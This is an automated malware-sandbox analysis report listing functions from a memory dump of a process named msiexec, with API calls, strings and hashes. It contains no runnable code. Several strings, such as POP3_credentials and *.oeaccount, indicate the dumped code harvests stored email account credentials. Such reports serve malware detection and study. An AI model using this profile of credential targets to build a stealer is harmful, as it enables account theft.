                                                                                                    Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$sprintfstrchrstrlen
                                                                                                    • String ID: %s@gmail.com
                                                                                                    • API String ID: 3902205911-4097000612
                                                                                                    • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                    • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                    Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004094C8
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                    • memset.MSVCRT ref: 0040950C
                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                    • String ID: sysdatetimepick32
                                                                                                    • API String ID: 3411445237-4169760276
                                                                                                    • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                    • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                    Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403504
                                                                                                    • memset.MSVCRT ref: 0040351A
                                                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscatmemset$_mbscpystrlen
                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                    • API String ID: 632640181-966475738
                                                                                                    • Opcode ID: 9db740f2358b076d42ab6db5cd0737fece105fa9b754ccc0f00d133d63461810
                                                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                    • Opcode Fuzzy Hash: 9db740f2358b076d42ab6db5cd0737fece105fa9b754ccc0f00d133d63461810
                                                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                    Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                    • String ID:
                                                                                                    • API String ID: 3642520215-0
                                                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                    Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 1999381814-0
                                                                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                    Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                    • API String ID: 1297977491-3883738016
                                                                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                    Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 438689982-4203073231
                                                                                                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                    Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm$__aullrem
                                                                                                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                    • API String ID: 643879872-978417875
                                                                                                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                    Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                    • memset.MSVCRT ref: 004058C3
                                                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                    • SetFocus.USER32(?), ref: 00405976
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4281309102-0
                                                                                                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                    Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`#v,00000000,?,?,0040A7BE,00000001,0044CBC0,76230A60), ref: 00406D4D
                                                                                                    • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                    • sprintf.MSVCRT ref: 0040A921
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                    • API String ID: 1631269929-4153097237
                                                                                                    • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                    • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                    Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040810E
                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,68137B60,?), ref: 004081B9
                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                    • API String ID: 524865279-2190619648
                                                                                                    • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                    • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                    Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                    • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                    • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                    Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004076D7
                                                                                                    • sprintf.MSVCRT ref: 00407704
                                                                                                    • strlen.MSVCRT ref: 00407710
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                    • strlen.MSVCRT ref: 00407733
                                                                                                    • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                    • String ID: %s (%s)
                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                    • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                    • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                    Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$memsetsprintf
                                                                                                    • String ID: %2.2X
                                                                                                    • API String ID: 125969286-791839006
                                                                                                    • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                    • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                    Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                      • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                    • String ID: ACD
                                                                                                    • API String ID: 82305771-620537770
                                                                                                    • Opcode ID: 06952686c39ef77086e9f0f234c990abac79310d7785f02afc60b77600e658f7
                                                                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                    • Opcode Fuzzy Hash: 06952686c39ef77086e9f0f234c990abac79310d7785f02afc60b77600e658f7
                                                                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                    Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004091EC
                                                                                                    • sprintf.MSVCRT ref: 00409201
                                                                                                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                      • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                    • String ID: caption$dialog_%d
                                                                                                    • API String ID: 2923679083-4161923789
                                                                                                    • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
